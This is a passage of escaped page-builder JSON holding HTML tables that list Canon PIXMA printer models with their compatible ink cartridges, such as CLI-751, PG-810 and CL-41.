(Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td 